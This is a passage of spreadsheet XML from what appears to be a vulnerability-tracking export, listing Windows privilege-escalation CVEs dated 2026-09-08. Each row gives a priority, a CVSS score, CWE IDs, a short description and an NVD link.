      </c>
      <c r="D768" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E768" s="5" t="inlineStr"/>
      <c r="F768" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G768" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H768" s="5" t="inlineStr"/>
      <c r="I768" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J768" s="5" t="inlineStr"/>
      <c r="K768" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L768" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69270</t>
        </is>
      </c>
    </row>
    <row r="769">
      <c r="A769" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69277</t>
        </is>
      </c>
      <c r="C769" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D769" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E769" s="5" t="inlineStr"/>
      <c r="F769" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G769" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H769" s="5" t="inlineStr"/>
      <c r="I769" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J769" s="5" t="inlineStr"/>
      <c r="K769" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L769" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69277</t>
        </is>
      </c>
    </row>
    <row r="770">
      <c r="A770" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69283</t>
        </is>
      </c>
      <c r="C770" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D770" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E770" s="5" t="inlineStr"/>
      <c r="F770" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G770" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H770" s="5" t="inlineStr"/>
      <c r="I770" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J770" s="5" t="inlineStr"/>
      <c r="K770" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L770" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69283</t>
        </is>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69284</t>
        </is>
      </c>
      <c r="C771" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D771" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E771" s="5" t="inlineStr"/>
      <c r="F771" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G771" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H771" s="5" t="inlineStr"/>
      <c r="I771" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J771" s="5" t="inlineStr"/>
      <c r="K771" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L771" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DCOM Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69284</t>
        </is>
      </c>
    </row>
    <row r="772">
      <c r="A772" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69289</t>
        </is>
      </c>
      <c r="C772" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D772" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E772" s="5" t="inlineStr"/>
      <c r="F772" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G772" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H772" s="5" t="inlineStr"/>
      <c r="I772" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J772" s="5" t="inlineStr"/>
      <c r="K772" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L772" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Setup Files Cleanup allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69289</t>
        </is>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69290</t>
        </is>
      </c>
      <c r="C773" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D773" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E773" s="5" t="inlineStr"/>
      <c r="F773" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G773" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H773" s="5" t="inlineStr"/>
      <c r="I773" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J773" s="5" t="inlineStr"/>
      <c r="K773" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L773" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69290</t>
        </is>
      </c>
    </row>
    <row r="774">
      <c r="A774" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69293</t>
        </is>
      </c>
      <c r="C774" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D774" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E774" s="5" t="inlineStr"/>
      <c r="F774" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G774" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H774" s="5" t="inlineStr"/>
      <c r="I774" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J774" s="5" t="inlineStr"/>
      <c r="K774" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L774" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69293</t>
        </is>
      </c>
    </row>
    <row r="775">
      <c r="A775" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69295</t>
        </is>
      </c>
      <c r="C775" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D775" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E775" s="5" t="inlineStr"/>
      <c r="F775" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G775" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H775" s="5" t="inlineStr"/>
      <c r="I775" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J775" s="5" t="inlineStr"/>
      <c r="K775" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="L775" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69295</t>
        </is>
      </c>
    </row>
    <row r="776">
      <c r="A776" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69298</t>
        </is>
      </c>
      <c r="C776" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D776" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E776" s="5" t="inlineStr"/>
      <c r="F776" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G776" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H77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76" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J776" s="5" t="inlineStr"/>
      <c r="K776" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L776" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69298</t>
        </is>
      </c>
    </row>
    <row r="777">
      <c r="A777" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69307</t>
        </is>
      </c>
      <c r="C777" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D777" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E777" s="5" t="inlineStr"/>
      <c r="F777" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G777" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H777" s="5" t="inlineStr"/>
      <c r="I777" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J777" s="5" t="inlineStr"/>
      <c r="K777" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L777" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69307</t>
        </is>
      </c>
    </row>
    <row r="778">
      <c r="A778" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69312</t>
        </is>
      </c>
      <c r="C778" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D778" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E778" s="5" t="inlineStr"/>
      <c r="F778" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G778" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H778" s="5" t="inlineStr"/>
      <c r="I778" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J778" s="5" t="inlineStr"/>
      <c r="K778" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L778" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69312</t>
        </is>
      </c>
    </row>
    <row r="779">
      <c r="A779" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69323</t>
        </is>
      </c>
      <c r="C779" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D779" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E779" s="5" t="inlineStr"/>
      <c r="F779" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G779" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H77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79" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J779" s="5" t="inlineStr"/>
      <c r="K779" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L779" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69323</t>
        </is>
      </c>
    </row>
    <row r="780">
      <c r="A780" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69324</t>
        </is>
      </c>
      <c r="C780" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D780" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E780" s="5" t="inlineStr"/>
      <c r="F780" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G780" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H780" s="5" t="inlineStr"/>
      <c r="I780" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J780" s="5" t="inlineStr"/>
      <c r="K780" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="L780" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows Performance Monitor allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69324</t>
        </is>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69328</t>
        </is>
      </c>
      <c r="C781" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D781" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E781" s="5" t="inlineStr"/>
      <c r="F781" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G781" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H781" s="5" t="inlineStr"/>
      <c r="I781" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J781" s="5" t="inlineStr"/>
      <c r="K781" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L781" s="5" t="inlineStr">
        <is>
          <t>Untrusted search path in Windows Storage allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69328</t>
        </is>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69348</t>
        </is>
      </c>
      <c r="C782" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D782" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E782" s="5" t="inlineStr"/>
      <c r="F782" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G782" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H782" s="5" t="inlineStr"/>
      <c r="I782" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J782" s="5" t="inlineStr"/>
      <c r="K782" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L782" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69348</t>
        </is>
      </c>
    </row>
    <row r="783">
      <c r="A783" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69352</t>
        </is>
      </c>
      <c r="C783" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D783" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E783" s="5" t="inlineStr"/>
      <c r="F783" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G783" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H783" s="5" t="inlineStr"/>
      <c r="I783" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J783" s="5" t="inlineStr"/>
      <c r="K783" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L783" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69352</t>
        </is>
      </c>
    </row>
    <row r="784">
      <c r="A784" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69359</t>
        </is>
      </c>
      <c r="C784" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D784" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E784" s="5" t="inlineStr"/>
      <c r="F784" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G784" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H784" s="5" t="inlineStr"/>
      <c r="I784" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J784" s="5" t="inlineStr"/>
      <c r="K784" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L784" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Active Directory Domain Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69359</t>
        </is>
      </c>
    </row>
    <row r="785">
      <c r="A785" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69368</t>
        </is>
      </c>
      <c r="C785" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D785" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E785" s="5" t="inlineStr"/>
      <c r="F785" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G785" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H785" s="5" t="inlineStr"/>
      <c r="I785" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J785" s="5" t="inlineStr"/>
      <c r="K785" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L785" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69368</t>
        </is>
      </c>
    </row>
    <row r="786">
      <c r="A786" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69377</t>
        </is>
      </c>
      <c r="C786" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D786" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E786" s="5" t="inlineStr"/>
      <c r="F786" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G786" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H786" s="5" t="inlineStr"/>
      <c r="I786" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J786" s="5" t="inlineStr"/>
      <c r="K786" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L786" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69377</t>
        </is>
      </c>
    </row>
    <row r="787">
      <c r="A787" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69389</t>
        </is>
      </c>
      <c r="C787" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D787" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E787" s="5" t="inlineStr"/>
      <c r="F787" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G787" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H787" s="5" t="inlineStr"/>
      <c r="I787" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J787" s="5" t="inlineStr"/>
      <c r="K787" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L787" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69389</t>
        </is>
      </c>
    </row>
    <row r="788">
      <c r="A788" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69391</t>
        </is>
      </c>
      <c r="C788" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D788" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E788" s="5" t="inlineStr"/>
      <c r="F788" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G788" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H788" s="5" t="inlineStr"/>
      <c r="I788" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J788" s="5" t="inlineStr"/>
      <c r="K788" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L788" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Broker Infrastructure Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69391</t>
        </is>
      </c>
    </row>
    <row r="789">
      <c r="A789" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69392</t>
        </is>
      </c>
      <c r="C789" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D789" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E789" s="5" t="inlineStr"/>
      <c r="F789" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G789" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H789" s="5" t="inlineStr"/>
      <c r="I789" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J789" s="5" t="inlineStr"/>
      <c r="K789" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L789" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69392</t>
        </is>
      </c>
    </row>
    <row r="790">
      <c r="A790" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69420</t>
        </is>
      </c>
      <c r="C790" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D790" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E790" s="5" t="inlineStr"/>
      <c r="F790" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G790" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H790" s="5" t="inlineStr"/>
      <c r="I790" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J790" s="5" t="inlineStr"/>
      <c r="K790" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L790" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69420</t>
        </is>
      </c>
    </row>
    <row r="791">
      <c r="A791" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69421</t>
        </is>
      </c>
      <c r="C791" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D791" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E791" s="5" t="inlineStr"/>
      <c r="F791" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G791" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H791" s="5" t="inlineStr"/>
      <c r="I791" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J791" s="5" t="inlineStr"/>
      <c r="K791" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="L791" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows Kernel Mode Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69421</t>
        </is>
      </c>
    </row>
    <row r="792">
      <c r="A792" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69424</t>
        </is>
      </c>
      <c r="C792" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D792" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E792" s="5" t="inlineStr"/>
      <c r="F792" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G792" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H792" s="5" t="inlineStr"/>
      <c r="I792" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J792" s="5" t="inlineStr"/>
      <c r="K792" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L792" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Distributed File System (DFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69424</t>
        </is>
      </c>
    </row>
    <row r="793">
      <c r="A793" s="5" t="inlineStr">
        <is>
